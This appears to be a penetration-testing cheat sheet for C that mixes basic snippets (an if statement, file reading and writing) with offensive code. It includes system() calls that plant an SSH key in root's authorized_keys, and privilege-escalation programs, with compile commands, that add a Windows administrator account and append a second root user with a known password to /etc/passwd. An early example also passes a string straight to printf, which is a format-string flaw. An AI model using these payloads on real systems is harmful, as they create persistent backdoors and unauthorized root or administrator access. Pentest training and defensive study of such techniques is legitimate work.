Cheat sheet and tricks for the C programming language.
Examples
#include <stdio.h>
const char IP[] = "x.x.x.x";
const int PORT = 80;
int main() {
printf(IP);
//code
return 0;
}If Statement
int i = 0;
int j = 1;
if (i == 0 && j == 0) {
printf("if");
} else if (i == 0 && j == 1) {
printf("else if");
} else {
printf("else");
}OS Commands
system("mkdir /root/.ssh");
system("touch /root/.ssh/authorized_keys");
system("echo 'ssh-rsa ...= kali@kali' > /root/ssh/authorized_keys");Files
Write to file
#include <stdio.h>
int main() {
FILE *pFile1;
char message[] = "This is my message";
pFile1=fopen("/tmp/message", "a");
fprintf(pFile1, "%s\n", &message);
fclose(pFile1);
}Read file
#include <stdio.h>
int main() {
FILE *pFile1;
char buff[255];
pFile1=fopen("/tmp/message", "r");
fgets(buff, 255, (FILE*)pFile1);
fclose(pFile1);
printf("%s", &buff);
}Compilation
See gcc.
Cross-Compilation
See Mingw-w64.
Exploit – Privilege Escalation
Windows
Add a user. Should be used with insecure file permissions of services. Cross-compile for Windows (check OS architecture).
#include <stdlib.h>
int main () {
int myprecious;
myprecious = system ("net user backup B@ckup123 /add");
myprecious = system ("net localgroup administrators backup /add");
return 0;
}i686-w64-mingw32-gcc myprecious.c -o myprecious.exeUnix
Add a second root user.
#include <stdlib.h>
int main () {
system("echo myprecious:$(openssl passwd PreciouS):0:0:root:/root:/bin/bash >> /etc/passwd");
}gcc myprecious.c -o myprecious